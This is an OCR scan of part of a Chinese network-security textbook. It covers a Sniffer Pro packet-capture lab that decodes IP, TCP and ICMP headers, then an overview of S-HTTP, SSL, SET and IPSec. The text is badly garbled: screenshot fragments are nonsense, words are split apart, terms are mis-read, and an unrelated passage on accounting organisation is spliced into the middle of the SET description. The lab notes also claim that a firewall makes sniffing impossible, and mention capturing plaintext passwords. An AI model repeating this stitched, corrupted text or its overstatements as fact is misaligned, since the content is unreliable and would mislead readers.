Dashboard 可 以 监控 网 络 的 利用 率 流量 及 错误 报 文 等 内 容 , 如 图 3.3.53 所 示 。 

从 Host Table 可 以 直观 地 看 出 连接 的 主机 ,如 图 3. 3. 54 所 示 ,显示 方式 为 IP 地 址 。 

(4) 定义 过 滤器 捕捉 192. 168. 0. 40 上 的 IP 数据 包 , 如 图 3. 3. 55 和 图 3. 3. 56 所 示 , 然 
后 单 击 “ 确 定 ” 按 钮 。 
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捕获 报 文 快 捷 键 


f Dashboard 


(a) 界面 1 


10 Mbps) 


Ede Monitor Capture Display Tools Database Window Hel 


of nino] S [Grea xl 


Open an existing document. Wer a pr ESTEE A 
(b) 界面 2 


图 3353 ”Dashboard 界 面 


[= Host Table: 13 stations 


连接 主机 的 IP 212191334055. 
E 202112254255 
E 202112264120 
202 112252 255 
202.112 252.23 
E) 202 104.129.253 


< 


McAPAPxJ 


图 3354 He The FA 


ixl 


Samaary | Address | Data Pattern Advanced | putter | peer 
EF nc sca 
OF cer 
CF rae wear ur 
Cy nmm 
OF m sa B 
由 - 口 mo. 11 
a 
TP ARP 
CT rw 4 
Packet Sire Packet Type 
ul - Zorel 加 
ACRE Error 
MI sizes Tabber z 


[we ] mm [rese 


图 3355 定义 过 滤 规 则 


aixi 
Summary Address | Data Pattern | Advanced | Buffer | Settings For: 
Address Known Address: (ragable) Fem 
Tr zi 
Mode 
G Include 
Exclude 
Station 1 vw. | Station 2 
4 |192.168.0.40 Bh Bony 
|2 8-5 
H CEJ ) 
日 LE! 
[s CE |) 
回 2-8 lel 
[we ] mm [rene 
图 3356 定义 嗅 探 地 址 
AA 


择 MATRIX 


(5) 从 Sniffer Pro 软件 中 的 Monitor 菜单 中 六 
192. 168. 0. 40 的 通信 情况 ,并 通过 右 击 该 地 址 ,在 快捷 菜单 中 ; 


ETE TE 
后 


[n 


图 


先 择 CAPTURE 


3 


2 
“他 


oO. 
令 开始 捕捉 。 


EE 
Bre 


57 显示 了 


图 3357 显示 的 通信 情况 


(6) 一 会 儿 停止 捕捉 后 ,选择 DECODE 选项 查看 捕捉 到 的 IP 包 , 如 图 3. 3. 58 所 示 。 


vet Frames] 


E 10-74 OP-QUERT STAT-OK NANEca grid 
,|DNS: C ID«75 OP-REGISTER NAME=com 
BROWSER: Local Master VIR207 Announce 

- AR 1D*75 OP-REGISTER STAT=Ref used 


609037049 SEQ" 4129) 
DeS3 S=1270 ACK«412905874 VINs17424 

: C ID«54784 OP«QUERY NÀME«1047972020242-: 
D-1270 S*53 ACK*1609037189 VIN=6432 

: R ID*54784 OP-QUERY STAT-Foraat error 
De53 5-1270 FIN ACK«412905888 SEO16090 


Version = 4, header length = 20 bytes 
Type of service = 00 
000 * routine 
normal delay 
normal throughput 
normal reliability 
ECT bit - transport protocol vill ignore the CE bit 
CE bit - no congestion 
Total length 48 bytes 
Identification = 1282 
Flags ax 
1 don't fragnent 
[] last fragment 
Fragment offset = 0 bytes 
Tine to live 128 seconds“hops 


图 3358 解码 数据 包 


(7) 图 3.3.59 中 有 3 个 窗口 ,最 上 面 的 窗口 是 捕捉 的 数据 ,中 间 的 窗口 是 数据 分 析 , 最 
下 面 的 窗口 是 原始 数据 包 , 用 十 六 进 制 表示 。 例 如 ,TCP Source port — 1282 对 应 下 面 的 
05 02, 


De1282 S*53 SYN ACK#1611929768 SEQ«4379 

D«53 5«1282 ACK*437322457 VIN=17424|60 

C 10723690 OP-QUERY NANEe1047972020242-]194 
; R ID«23680 OP-OUERY STAT-Format error 


IP. Destination address = [192.5.6.30]. a gtld-servera net 


IP: No options 


Destination port 
Initial sequence nuaber = 
Next expected Seq nuaber= 


53 (Domain! 
1611929767 
1611929768 


Data offset 28 bytes 
Flags 02 
(No urgent pointer) 
(No acknovledgnent ) 
(No push) 
(No reset) 
SI 
(No FIN) 
62 a6 37 08 00 45 00 
40 00 80 06 be ae cO a8 00 28 cO OS 


00 35 60 14 18 a7 00 00 00 00 70 02 
00000030: 40 00 3e 39 00 00 02 04 05 b4 01 01 04 02 


图 3399 数据 分 析 窗 口 


(8) 从 窗口 中 可 以 看 出 ,IP 数据 包 封装 在 TCP 数据 包 的 前 面 , 如 图 3. 3. 60 所 示 。 


DLC 首 部 IP TCP DLC 尾 部 


IP 头 TCP, TCP 数 据 


Version = 4. header length = 20 bytes 
Type of service = 
000 * routine 
= normal delay 
* normal throughput 
normal reliability 
- transport protocol vill ignore the CE bit 


Total length 
Identification = 
Flags 
1 
0 
Fregwent offset ~ 
Time to live 
Protocol -6( 
Header checksum = 6EAE (correct) 
Source address = (192.168.0.40). VIR207 
Destination address = [192.5.6.30]. a.gtld-servers net 


No options 


TCP header 


7 00 00 00 00 70 02 
4 01 01 04 02 


图 3360 数据 分 析 窗 口 


(9) IP 数据 包头 的 结构 示意 图 如 图 3. 3. 61 所 示 。 查 看 IP 头 , 如 图 3. 3. 62 所 示 。 


16 位 总 长 度 ( 字 节 数 ) 
13 位 片 位 移 
16 位 首部 校 验 和 


16 位 标识 


8 位 生存 周期 (TTL) 


8 位 协议 


32 位 源 地 址 IP 


32 位 目的 地 址 IP 


选项 (如 果 有 ) 


图 3361 IP 数 据 包头 的 结构 示意 图 


(10) TCP 的 结构 示意 图 如 图 3. 3. 63 所 示 。TCP 包头 结构 如 图 3. 3. 64 所 示 。 

QD 定义 过 滤器 捕捉 192. 168. 0. 40 的 ICMP 数据 包 , 如 图 3. 3. 65 所 示 。 

(12) 从 本 机 192. 168. 0. 245 Ping 192. 168. 0. 40 ,如 图 3. 3. 66 所 示 。 

(13) 停止 捕捉 后 , 从 Decode 窗口 中 找 出 Echo 及 Echo reply 数据 包 , 如 图 3. 3. 67 
所 示 o 
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ETE [ossa al 
加 加 | ls| Olsialeimialala) z.| e| sj 


D-1282 9"53 SYN ACK-1611923768 SEO 
De53 $«1282 —— ACK«437922457 VIN=17424 
C D-23680 OP-QUERY NÀME-1047972020242- 
R ID*23680 OP-QUERY STAT+Foraat error 

DeS3 S*1282 FIN ACK«437922471 SEQ*16119 
D«53 Se1283 SYN SEQ-1612245154 LEN-0 VII 
D«1282 S53  — ACK«1611329908 UIN«6432 
D«53 «1282  ACK=437922471 WIN-17410 
D«1282 9*53 FIN ACK«1611329909 SEO-4379 
D"53 9«1282 ACK«437922472 WIN=17410 

3 S53 SYN A 


Version * 4, header length = 20 bytes 
Type of service = 00 
000 * routine 
o normal delay 
normal throughput 
normal reliability 
ECT bit - trensport protocol vill ignore the CE bit 
CE bit - no congestion 
Total length 48 bytes 
Identification = 1318 
Flags ax 
1 don't fregnent 
lest fragment 
Fragment offset = 0 bytes 
Tine to live 128 seconds/hops 
Protocol 6 (TCP) 
Header checksua * EAE (correct) 


[J IP. Destination address = (192.5.6.30] 
IP: No options 


图 3362 查看 IP 头 


ACK 437922457 UIN*17424 
h QP-QUERY NAME=1047972020242-' 
R ID=23680 OP-QUERY STAT-Fornat error 
Be52 $1282 FIN acke437922471 SEQ-16119 
53 Se1283 SYN SED«1612245154 LEM. 

1611925908 VIN-6402 
37922471 WIN*17410 
611929309 SEQ*4379} 
37922472, VIN17410 

12245155 SEO- 


1282 
Destination port = $3 (Domain) 

Initial sequence number = 1611929767 

Next expected Seq nuaber= 1611929768 

Data offset 28 bytes 

Flags [3 

(No urgent pointer) 
(No acknovledgment) 


(No FIN) 
16384 
3539 (correct) 


Vindov = 
Checksum . 
Options follow 

Maximus segment size = 1460 
No-op 

No-op 

SACK-Pernitted Option 


图 3363 TCP 的 结构 示意 
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源 端 口号 1282 目标 端口 号 : 53 


32 位 询问 序号 : 1611929767 


32 位 确认 序号 : 1611929768 


偏 移 | 保留 | URG | ACK | PSH | PST | SYN] FIN | 16 位 窗口 大 小 : 65535 


16 位 紧 生 


Het 


16 位 


选项 


数据 


图 3364 TCP 包 头 结构 


zizi 


Summary | Address | Data Pattern Advanced | Settings For: 
CY ree w al 
DY rm sma 

&-[ ^ IEEE802.11 
-PFI 
T7388) cr d 
TD) cor 
DA eo 
Ve) 
T8 Iur = 
Packet Size (Packet Type 
Au = E 
All sizes [Jabber 到 
取消 “| Profiles... 


图 3366 Fng 目 标 主机 


(14) 分 析 ICMP 数据 包 的 头 信息 ,如 图 3. 3. 68 所 示 。 
ICMP 类 型 : 8。 

代码 : 0。 

校 验 和 : 395C( 正 确 ) 。 

确认 号 : 1024。 

序号 : 4096。 

数据 长 度 : 32B。 
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e 132.166.0.242]][122-166.0-40] JICHE: Echo EEE 10.000 
133 168 0.40). [133 168.0.444] ICME Echo reply $0 000| 0:000 583 
E reply 


E 
00: 
00 
00 
00 
:00: 
ol 

90: 
an 


DLC: Source = Station Ivill 00C41E 
DLC: Ethertype = 0800 (IP) 


Version * 4. header length = 20 bytes 
Type of service » 00 
000 * routine 
0 normal delay 
0 normal throughput 
0.. = normal reliability 
0. » ECT bit ~ transport protocol vill ignore the CE bit 
0 * CE bit - no congestion 
Total length 60 bytes 
Identification = 603 
Flags ox 
aay fragment 
0 last fragment 
Fragaent offset = 0 bytes 
Tine to live 128 seconds/hops 
Protocol 1 (ICMP) 
Header checksum * BSF8 (correct) 
= [192.168.0.245) 


ol, Ethernet (Line speed at s Lthernet Framesi 


Total length 
Identification 
Flags 

o nay fragment 

0 last fragment 
Fragment offset = 0 bytes 
Tine to live 128 seconds/hops 
Protocol 1 (ICMP) 
Header checksum = BSF8 (correct) 
Source address = (192.168.0.245] 
Destination address = (192.168.0.40] 
No options 


一 -一 ICP header 
ICMP 


ICMP; Code = 0 
ICMP: Checksum = 395C (correct) 
ICMP: Identifier = 1024 
ICP: Sequence nuxber = 4096 
ICMP; [32 bytes of data] 
ICMP 
l end of “ICMP header". ] 


图 3368 ICMP 包 具体 结构 
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提示 : 

A) Sniffer 是 一 个 强大 的 提包 工具 。 数 据 包 的 分 析 功 能 强大 ,如 果 正 确 使 用 ,将 对 分 
析 、 定 位 网 络 故障 十 分 有 用 。 

(2) 同时 ,Sniffer 工具 由 于 功能 强大 ,甚至 可 以 充当 HCAKER 工具 ,因为 很 多 协议 是 
明文 传输 ,如 FTP, TELNET 等 ,通过 Sniffer 工具 可 以 查看 用 户 名 和 密码 。 

G) 从 OSI 结构 上 看 ,IP 包 属 于 三 层 网 络 层 ,TCP 包 属 于 四 层 传输 层 。 在 数据 包 中 ,IP 
头 在 TCP 头 的 前 面 。 

(4) 从 实验 中 可 以 清晰 地 看 出 TCP 的 3 次 握手 过 程 。 

(5) 由 实验 可 以 看 出 ,Sniffer Pro 可 以 探查 出 局 域 网 内 流动 的 任何 信息 ,尤其 是 用 户 名 
和 密码 之 类 敏感 的 数据 ,所 以 在 局 域 网 内 的 安全 就 至 关 重 要 了 。 其 实 , 只 要 在 计算 机 内 安装 


上 网 络 防火 墙 ,并 把 Windows 操作 系统 的 安全 级 别提 高 ,Sniffer Pro 工具 可 能 就 嗅 探 不 到 
任何 信息 了 。 


实验 报告 要 求 


。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
© 闸 述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 4 童 网 络 安 全 协议 与 内 容 安 全 实验 


4.1 网 络 安全 协议 与 内 容 安全 概述 


网 络 安全 协议 与 内 容 安全 是 营造 网 络 安全 环境 的 基础 ,是 构建 安全 网 络 的 关键 技术 因 
素 。 设 计 并 保证 网 络 安全 协议 与 内 容 的 安全 性 和 正确 性 能 够 从 基础 上 保证 网 络 安全 ,避免 
因 网 络 安全 等 级 不 够 而 导致 网 络 数据 信息 丢失 或 文件 损坏 等 信息 泄露 问题 。 在 计算 机 网 络 
应 用 中 ,人 们 对 计算 机 通信 的 协议 与 内 容 安全 进行 了 大 量 的 研究 ,以 提高 网 络 信息 传输 的 安 
全 性 。 


4.1.1 基本 概念 


安全 协议 是 以 密码 学 为 基础 的 消息 交换 协议 ,也 称 作 密码 协议 ,其 目的 是 在 网 络 环境 中 
提供 各 种 安全 服务 。 安 全 协议 是 网 络 安全 的 一 个 重要 组 成 部 分 ,通过 安全 协议 可 以 实现 实 
体 认 证 .数据 完整 性 校 验 、 密 钥 分 配 .收发 确认 以 及 不 可 和 否认 性 验证 等 安全 功能 。 

信息 内 容 安全 是 指 研究 如 何 利用 计算 机 从 包含 海量 信息 且 迅 速 变化 的 网 络 中 ,对 与 特 
定安 全 主题 相关 的 信息 进行 自动 获取 、 识 别 和 分 析 的 技术 。 

“信息 内 容 ” 涉 及 动画 ,游戏 ,影视 数字 出 版 .数字 创作 数字 馆藏 ,数字 广告 .互联 网 \ 信 
息 服务 .咨询 .移动 内 容 、 数 字 化 教育 .内 容 软件 等 ,主要 分 为 政务 型 .公益 型 .商业 型 3 种 
类 型 。 

信息 内 容 的 定义 来 源 于 数字 内 容 产 业 。 一 般 来 说 ,“ 信 息 内 容 产 业 ” 指 的 是 基于 数字 化 、 
网 络 化 ,利用 信息 资源 创意 制作 、 开 发 .分 销 、 交 易 的 产品 和 服务 的 产业 。 

信息 内 容 的 重要 性 : 随 着 互联 网 的 普及 ,信息 内 容 的 种 类 与 数量 急剧 膨胀 ,其 中 鱼 目 混 
珠 , 反 动 言论 .盗版 ,淫秽 与 暴力 等 不 良 内容 充 斥 其 间 。 由 于 信息 内 容 安全 涉及 国家 利益 、 社 
会 稳定 和 民心 导向 ,因此 受到 各 方 的 普遍 关注 。 

信息 内 容 安 全 的 含义 : 数字 信息 资源 内 容 的 安全 性 需要 保护 合法 信息 资源 (包括 动画 、 
游戏 .影视 .数字 出 版 ,数字 创作 ,数字 馆藏 .数字 广告 互联网、 信息 服 务 .咨询 .移动 内 容 、 数 
字 化 教育 .内容 软件 等 ) 的 版 权 和 应 得 的 利益 。 

对 有 害 信息 资源 内 容 的 可 控 性 ,网 上 充斥 着 宣扬 反动 、 色 情 、 暴 力 、 犯 罪 的 内 容 , 对 社会 
和 谐 构 成 威胁 ,需要 进行 控制 。 

信息 内 容 安 全 的 宗旨 在 于 防止 非 授 权 的 信息 内 容 进 出 网 络 。 具 体 表现 在 : 

CD 政治 性 。 防 止 来 自 国内 外 反动 势力 的 攻击 .诬陷 与 西方 的 和 平 演变 图 谋 。 

(2) 健康 性 。 剔 除 色情 淫秽 和 暴力 内 容 等 。 

(3) 保密 性 。 防 止 国家 和 企业 机 密 被 窃取 、 泄 露 和 流失 。 

(4) 隐私 性 。 防 止 个 人 隐私 被 盗 取 、 倒 卖 .滥用 和 扩散 。 

(5) 产权 性 。 防 止 知识 产权 被 有 窃 .盗用 等 。 

(6) 防护 性 。 防 止 病毒 .垃圾 邮件 、 网 络 蠕虫 等 恶意 信息 耗费 网 络 资源 。 
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主要 的 协议 标准 有 
OD 安全 超 文本 传输 协议 (S-HTTP)。 
依靠 密 钥 对 的 加 密 ,保障 Web 站 点 间 的 交易 信息 传输 的 安全 性 。 
(2) 安全 套 接 层 (SSL) 协 议 。 
由 Netscape 公司 提出 的 安全 交易 协议 ,提供 加 密 、 认 证 服务 和 报 文 的 完整 性 。SSL 被 
用 于 Netscape Communicator 和 Microsoft IE 浏览 器 ,以 完成 需要 的 安全 交易 操作 。 
(3) 安全 交易 技术 (Secure Transaction Technology,STT) 协 议 。 
Microsoft 公司 提出 ,STT 将 认证 和 解密 在 浏览 器 中 分 离开 ,用 以 提高 安全 控制 能 
Hi. Microsoft 在 Internet Explorer 中 采用 这 一 技术 。 

(4) 安全 电子 交易 (Secure Electronic Transaction, SET) HN. 

此 协议 是 一 种 应 用 于 因特网 (Internet) 环 境 下 ,以 信用 卡 为 基础 的 安全 电子 交付 协议 。 

网 络 安全 协议 的 作用 是 在 网 络 的 各 个 层面 上 提供 不 同 的 安全 服务 。 

内 容 安 全 的 范畴 : 

(1) 与 情 监测 。 

与 情 监测 是 对 互联 网 上 公众 的 言论 和 观点 进行 监视 和 预测 的 行为 。 这 些 言论 主要 为 对 
现实 生活 中 某 些 热 点 、 焦 点 问题 所 持 的 有 较 强 影响 力 、 倾 向 性 的 言论 和 观点 。 

(2) 信息 过 滤 。 

信息 过 滤 是 用 以 描述 一 系列 将 信息 传递 给 需要 它 的 用 户 处 理 过 程 的 总 称 。 

(3) WAAR. 

针对 所 有 被 分 享 到 互联 网 上 可 以 被 查看 . 读 取 的 信息 ,确立 切实 可 行 的 信息 规制 机 制 ， 
制定 全 面 、 准 确 的 分 集 标准 , 在 实践 层面 形成 可 操作 的 制度 性 规范 。 

(4) 信息 隐藏 。 

信息 隐藏 是 指 在 设计 和 确定 模块 时 ,使 得 一 个 模块 内 包含 的 特定 信息 (过 程 或 数据 ) ,对 
于 不 需要 这 些 信息 的 其 他 模块 来 说 是 不 可 访问 的 。 


4.1.2 应 用 层 安 全 协议 


1. 安全 超 文 本 传输 协议 

安全 超 文本 传输 协议 (Secure-Hypertext Transfer Protocol,S-HTTP) 是 一 种 面向 安全 
信息 通信 的 协议 , 它 可 以 和 HTTP 结合 起 来 使 用 。S-HTTP 能 与 HTTP 信息 模型 共存 ,并 
易于 与 HTTP 应 用 程序 整合 。 

S-HTTP 为 HTTP 客户 机 和 服务 器 提供 了 多 种 安全 机 制 ,提供 安全 服务 选项 是 为 了 适 
用 于 万 维 网 上 的 各 类 潜在 用 户 。S-HTTP 为 客户 机 和 服务 器 提供 了 相同 的 性 能 (同等 对 待 
请 求 和 应 答 ,也 同等 对 待 客户 机 和 服务 器 ) ,同时 维持 HTTP 的 事务 模型 和 实施 特征 。 

S-HTTP 客户 机 和 服务 器 能 与 某 些 加 密 信息 格式 标准 相 结 合 。S-HTTP 支持 多 种 兼 
容 方案 并 且 与 HTTP 兼容 。 使 用 S-HTTP 的 客户 机 能 够 与 没有 使 用 S-HTTP 的 服务 器 连 
接 , 反 之 亦 然 , 但 是 这 样 的 通信 明显 不 会 利用 S-HTTP 安全 特征 。 

S-HTTP 不 需要 客户 端 公用 密 钥 认证 (或 公用 密 钥 ) ,但 它 支持 对 称 密 钥 的 操作 模式 。 
这 一 点 很 重要 ,因为 这 意味 着 即使 没有 要 求 用 户 拥 有 公用 密 钥 ,私人 交易 也 会 发 生 。 虽 然 
S-HTTP 可 以 利用 大 多 现 有 的 认证 系统 .但 S-HTTP 的 应 用 并 不 必 依赖 这 些 系统 。 
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S-HTTP 支持 端 对 端 安 全 事务 通信 。 客 户 机 可 能 “首先 ”启动 安全 传输 (使 用 报头 的 信 
息 ) ,例如 它 可 以 用 来 支持 已 填 表 单 的 加 密 。 使 用 S-HTTP, 敏 感 的 数据 信息 不 会 以 明文 形 
式 在 网 络 上 发 送 。 

S-HTTP 提供 了 完整 且 灵 活 的 加 密 算法 、 模 态 及 相关 参数 。 选 项 谈判 用 来 决定 客户 机 
和 服务 器 在 事务 模式 、 加 密 算法 (用 于 签名 的 RSA 和 DSA、 用 于 加 密 的 DES 和 RC 等 ) 及 
证 书 选择 方面 取得 一 致意 见 。 

虽然 S-HTTP 的 设计 者 承认 他 有 意识 地 利用 了 多 根 分 层 的 信任 模型 和 许多 公 钥 证 书 
系统 ,但 S-HTTP 仍 努力 避 开 对 某 种 特定 模型 的 滥用 。S-HTTP 与 摘要 验证 (在 [RFC- 
2617] 中 有 描述 ) 的 不 同 之 处 在 于 , 它 支 持 公 钥 加 密 和 数字 签名 ,并 具有 保密 性 。HTTPS fF 
为 男 一 种 安全 Web 通信 技术 ,是 指 HTTP 运行 在 TLS 和 SSL 上 面 的 实现 安全 Web 事务 
的 协议 。 

2. 安全 套 接 层 协 议 

安全 套 接 层 (Secure Socket Layer,SSL) 协 议 是 Netscape 公司 率先 采用 的 网 络 安全 协 
议 。 它 是 在 传输 通信 协议 (TCP/IP) 上 实现 的 一 种 安全 协议 ,采用 公开 密 钥 技 术 。SSL 广泛 
支持 各 种 类 型 的 网 络 ,同时 提供 3 种 基本 的 安全 服务 ,它们 都 使 用 公开 密 钥 技术 。 

SSL 协议 的 优势 在 于 , 它 是 与 应 用 层 协 议 独 立 无 关 的 。 高 层 的 应 用 层 协 议 ( 如 HTTP, 
FTP、Telnet 等 ) 能 透明 地 建立 于 SSL 协议 之 上 。SSL 协议 在 应 用 层 协 议 通信 之 前 就 已 经 
完成 了 加 密 算法 、 通 信和 密 钥 的 协商 以 及 服务 器 认证 工作 。 在 此 之 后 ,应 用 层 协 议 传送 的 数据 
都 会 被 加 密 , 从 而 保证 通信 的 私密 性 。 

SSL 的 安全 服务 有 

(1) 信息 保密 。 

通过 使 用 公开 密 钥 和 对 称 密 钥 技术 ,以 达到 信息 保密 。SSL 客户 机 和 服务 器 之 间 的 所 
有 业务 都 使 用 在 SSL 握手 过 程 中 建立 的 密 钥 和 算法 进行 加 密 。 这 样 就 防止 了 某 些 用 户 通 
过 使 用 IP 数据 包 嗅 探 工 具 非 法 窃听 。 尽 管 数据 包 嗅 探 仍 能 捕捉 到 通信 的 内 容 , 但 却 无 法 
破译 。 

(2) 信息 完整 性 ,确保 SSL 业务 全 部 达到 目的 。 

应 确保 服务 器 和 客户 机 之 间 的 信息 内 容 免 受 破坏 。SSL 利用 机 密 共享 和 hash. 函数 组 
提供 信息 完整 性 服务 。 

(3) 双向 认证 ,客户 机 和 服务 器 相互 识别 的 过 程 。 

它们 的 识别 号 用 公开 密 钥 编码 ,并 在 SSL 握手 时 交换 各 自 的 识别 号 。 为 了 验证 持 有 者 
是 否 是 其 合法 用 户 ( 而 不 是 冒名 用 户 ) ,SSL 要 求证 明 持 有 者 在 握手 时 对 交换 数据 进行 数字 
式 标识 。 证 明 持 有 者 对 包括 证 明 的 所 有 信息 数据 进行 标识 ,以 说 明 自 己 是 证 明 的 合法 拥有 
者 。 这 样 就 防止 了 其 他 用 户 冒 名 使 用 证 明 。 证 明 本 身 并 不 提供 认证 ,只 有 证 明和 密 钥 一 起 
才 起 作用 。 

(4) SSL 的 安全 性 服务 对 终端 用 户 来 讲 做 到 尽 可 能 透明 。 

一 般 情 况 下 ,用 户 只 单 击 桌面 上 的 一 个 按钮 或 连接 ,就 可 以 与 SSL 的 主机 相连 。 与 标 
准 的 HTTP 连接 申请 不 同 , 一 台 支 持 SSL 的 典型 网 络 主机 进行 SSL 连接 的 默认 端口 是 
443 ,而 不 是 80。 
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3. 安全 电子 交易 协议 

安全 电子 交易 (Secure Electronic Transaction ,SET) 协 议 是 一 种 应 用 于 因特网 环境 下 ， 
以 信用 卡 为 基础 的 安全 电子 交付 协议 , 它 给 出 了 一 套 电子 交易 过 程 的 规范 。 通 过 SET 协 
议 ,可 以 实现 电子 商务 交易 中 的 加 密 、 认 证 、 密 钥 管理 机 制 等 ,保证 了 在 因特网 上 使 用 信用 卡 
进行 在 线 购 物 的 安全 。 

其 主要 目的 是 解决 信用 卡 电子 付款 的 安全 保障 性 问题 ,这 包括 : 保证 信息 的 机 密 性 , 保 
证 信息 安全 传输 ,不 能 被 窃听 ,只 有 收 件 人 才能 得 到 和 解密 信息 ;保证 支付 信息 的 完整 性 , 保 
证 传输 数据 完整 接收 ,在 中 途 不 被 算 改 ;认证 商家 和 客户 ,验证 在 公共 网 络 上 进行 的 交易 活 
动 包括 会 计 机 构 的 设置 ,会 计 人 员 的 配备 及 其 职责 权利 的 履行 和 会 计 法 规 、 制 度 的 制定 与 实 
施 等 内 容 。 合 理 、. 有 效 地 组 织 会计 工 作 , 意 义 重 大 . 它 有 助 于 提高 会 计 信息 质量 ,执行 国家 财 
经 纪律 和 有 关 规 定 ; 有 助 于 提高 经 济 效益 ,优化 资源 配置 。 会 计 工作 的 组 织 必须 合法 合 规 。 
讲求 效益 ,必须 建立 完善 的 内 部 控制 制度 ,必须 有 强 有 力 的 组 织 保证 。 

SET 支付 系统 主要 由 持 卡 人 (card holder) ,商家 (merchant) , KK FF (issuing bank) , ilit 
单行 (acquiring bank) 支付 网 关 (payment gateway) A HE P (certificate authority) 6 部 
分 组 成 。 对 应 地 ,基于 SET 协议 的 网 上 购物 系统 至 少 包括 电子 钱包 软件 、 商 家 软件 、 支 付 网 
关 软 件 和 签发 证 书 软件 。 

其 工作 流程 为 : 

CD 消费 者 利用 自己 的 PC 通过 因特网 选 定 所 要 购买 的 物品 ,并 在 计算 机 上 输入 订货 
单 。 订 货 单 上 需 包 括 在 线 商店 、 购 买 物 品名 称 及 数量 、 交 货 时 间 及 地 点 等 相关 信息 。 

(2) 通过 电子 商务 服务 器 与 有 关 在 线 商店 联系 ,在 线 商店 做 出 应 答 ,告诉 消费 者 所 填 订 
货 单 的 货物 单价 .应 付款 数 、. 交 货 方 式 等 信息 是 否 准确 ,是 否 有 变化 。 

(3) 消费 者 选择 付款 方式 ,确认 订单 签发 付款 指令 ,此 时 SET 开始 介入 。 

(4) FE SET 中 ,消费 者 必须 对 订单 和 付款 指令 进行 数字 签名 ,同时 利用 双重 签名 技术 
保证 商家 看 不 到 消费 者 的 账号 信息 。 

(5) 在 线 商 店 接收 订单 后 ,向 消费 者 所 在 银行 请 求 支付 认可 。 信 息 通过 支付 网 关 到 收 
单 银 行 ,再 到 电子 货币 发 行 公司 确认 。 批 准 交易 后 .返回 确认 信息 给 在 线 商店 。 

(6) 在 线 商店 发 送 订单 确认 信息 给 消费 者 。 消 费 者 端 软件 可 记录 交易 日 志 , 以 备 将 来 
查询 。 

(7) 在 线 商 店 发 送 货物 或 提供 服务 并 通知 收 单 银 行将 钱 从 消费 者 的 账号 转移 到 商店 账 
号 ,或 通知 发 卡 银行 请 求 支付 。 在 认证 操作 和 支付 操作 中 间 一 般 会 有 一 个 时 间 间 隔 ,例如 ， 
在 每 天 的 下 班 前 请 求 银行 结算 一 天 的 账 。 

前 两 步 与 SET 无 关 , 从 第 三 步 开始 ,SET 起 作用 ,一 直到 第 六 步 。 在 处 理 过 程 中 ,关于 
通信 协议 .请 求 信息 的 格式 、 数 据 类 型 的 定义 等 ,SET 对 其 都 有 明确 的 规定 。 在 操作 的 每 一 
步 ,消费 者 ,在 线 商店 、 支 付 网 关 都 通过 CA( 认 证 中 心 ) 验 证 通信 主体 的 身份 ,以 确保 通信 的 
对 方 不 是 冒名 顶替 ,所 以 也 可 以 简单 地 认为 SET 规格 充分 发 挥 了 认证 中 心 的 作用 ,以 维护 
在 任何 开放 网 络 上 的 电子 商务 参与 者 提供 信息 的 真实 性 和 保密 性 。 

4. Internet 协议 安全 性 

Internet 协议 安全 性 (IPSec) 是 一 种 开放 标准 的 框架 结构 ,通过 使 用 加 密 的 安全 服务 ， 
以 确保 在 Internet 协议 (IP) 网 络 上 进行 保密 而 安全 的 通信 。Microsoft® Windows® 2000, 
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Windows XP 和 Windows Server 2003 家 族 实施 IPSec 是 基于 “Internet 工程 任务 组 (IETF)” 
与 IPSec 工作 组 开发 的 标准 。 

IPSec 是 安全 联网 的 长 期 方向 。 它 通过 端 对 端的 安全 性 提供 主动 的 保护 ,以 防止 专用 
网 络 与 Internet 的 攻击 。 在 通信 中 ,只 有 发 送 方 和 接收 方才 是 唯一 必须 了 解 IPSec 保护 的 
计算 机 。 在 Windows 2000, Windows XP 和 Windows Server 2003 家 族 中 ,IPSec 提供 了 一 
种 能 力 ,以 保护 工作 组 .局域网 计算 机 、 域 客户 端 和 服务 器 .分 支 机 构 ( 物 理 上 为 远程 机 构 )、 
Extranet 以 及 漫游 客户 端 之 间 的 通信 。 

IPSec 是 Internet 工程 任务 组 (Internet Engineering Task Force,IETF) 的 IPSec 小 组 
建立 的 一 组 IP 安全 协议 集 。IPSec 定义 了 在 网 际 层 使 用 的 安全 服务 ,其 功能 包括 数据 加 
密 、 对 网 络 单元 的 访问 控制 .数据 源 地 址 验证 数据 完整 性 检查 和 防止 重 放 攻 击 。 

IPSec 的 安全 服务 要 求 支持 共享 密 钥 完 成 认证 和 /或 保密 ,并 且 手 工 输入 密 钥 的 方式 是 
必须 要 支持 的 ,其 目的 是 保证 IPSec 协议 的 互 操作 性 。 当 然 , 手 工 输入 密 钥 方式 的 扩展 能 力 
很 差 , 因 此 在 IPSec 协议 中 引入 了 一 个 密 钥 管理 协议 , 称 Internet 密 钥 交换 协议 一 一 IKE， 
该 协议 可 以 动态 认证 IPSec 对 等 体 ,协商 安全 服务 ,并 自动 生成 共享 密 钥 。 

IPSec 的 安全 特性 主要 有 

1) 不 可 否认 性 

不 可 否认 性 可 以 证 实 消 息 发 送 方 是 唯一 可 能 的 发 送 者 ,发送 者 不 能 否认 发 送 过 的 消息 。 
不 可 和 否认 性 是 采用 公 钥 技术 的 一 个 特征 , 当 使 用 公 钥 技术 时 ,发 送 方 用 私 钥 产生 一 个 数字 签 
名 随 消息 一 起 发 送 ,接收 方 用 发 送 者 的 公 钥 验证 数字 签名 。 由 于 在 理论 上 只 有 发 送 者 才 唯 
一 拥有 私 钥 ,也 只 有 发 送 者 才 可 能 产生 该 数字 签名 ,所 以 只 要 数字 签名 通过 验证 ,发送 者 就 
不 能 否认 曾 发 送 过 该 消息 。 但 不 可 否认 性 不 是 基于 认证 的 共享 密 钥 技术 的 特征 ,因为 在 基 
于 认证 的 共享 密 钥 技术 中 ,发 送 方 和 接收 方 掌握 了 相同 的 密 钥 。 

2) 反 重播 性 

反 重播 确保 每 个 IP 包 的 唯一 性 ,保证 信息 万 一 被 截取 复制 后 ,不 能 再 被 重新 利用 、 重 新 
传输 回 目的 地 址 。 该 特性 可 以 防止 攻击 者 截取 破译 信息 后 ,再 用 相同 的 信息 包 冒 取 非 法 访 
问 权 (即使 这 种 冒 取 行 为 发 生 在 数 月 之 后 ) 。 

3) 数据 完整 性 

防止 传输 过 程 中 的 数据 被 算 改 ,确保 发 出 的 数据 和 接收 的 数据 一 致 。IPSec 利用 Hash 
函数 为 每 个 数据 包产 生 一 个 加 密 检查 和 ,接收 方 在 打开 包 前 先 计算 检查 和 ,车 包 遭 自 改 , 导 
致 检查 和 不 相符 ,数据 包 即 被 丢弃 。 

